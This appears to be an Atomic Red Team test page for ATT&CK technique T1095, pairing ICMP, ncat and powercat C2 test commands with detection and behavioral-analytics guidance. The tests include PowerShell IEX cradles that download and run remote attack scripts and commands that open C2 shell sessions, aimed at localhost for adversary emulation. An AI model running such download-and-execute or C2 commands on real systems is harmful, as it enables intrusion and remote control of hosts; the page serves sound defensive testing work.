# T1095 - Non-Application Layer Protocol
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

## Atomic Tests

### Atomic Test #1 - ICMP C2This will attempt to  start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress 127.0.0.1
```

In [ ]:
Invoke-AtomicTest T1095 -TestNumbers 1

### Atomic Test #2 - Netcat C2
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following: 
nc -l -p <port>

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: ncat.exe must be available at specified location (#{ncat_exe})

##### Check Prereq Commands:
```powershell
if( Test-Path "$env:TEMP\T1095\nmap-7.80\ncat.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path $env:TEMP\T1095 | Out-Null
$parentpath = Split-Path (Split-Path "$env:TEMP\T1095\nmap-7.80\ncat.exe"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest  "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
  Expand-Archive $zippath $parentpath -Force
  $unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}

```

In [ ]:
Invoke-AtomicTest T1095 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80
```

In [ ]:
Invoke-AtomicTest T1095 -TestNumbers 2

### Atomic Test #3 - Powercat C2Start C2 Session Using Powercat
To start the listener on a Linux device, type the following: 
nc -l -p <port>
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c 127.0.0.1 -p 80
```

In [ ]:
Invoke-AtomicTest T1095 -TestNumbers 3

## Detection
Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) 

Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.


## Shield Active Defense
### Behavioral Analytics 
 Deploy tools that detect unusual system or user behavior.
 

 Instrument a system to collect detailed information about process execution and user activity, develop a sense of normal or expected behaviors, and alert on abnormal or unexpected activity.  This can be accomplished either onboard the target system or by shipping data to a centralized analysis and alerting system.
#### Opportunity
There is an opportunity to detect the presence of an adversary by identifying and alerting on anomalous behaviors.
#### Use Case
A defender can detect the use of non-standard protocols. By implementing behavior analytics specific to a rise in protocol traffic to a system or set of systems, one might be able to detect malicious communications from an adversary.
#### Procedures
Use behavioral analytics to detect Living Off The Land Binaries (LOLBins) being used to download and execute a file.
Use behavioral analytics to identify a system running development tools, but is not used by someone who does development.
Use behavioral analytics to identify abnormal system processes being used to launch a different process.
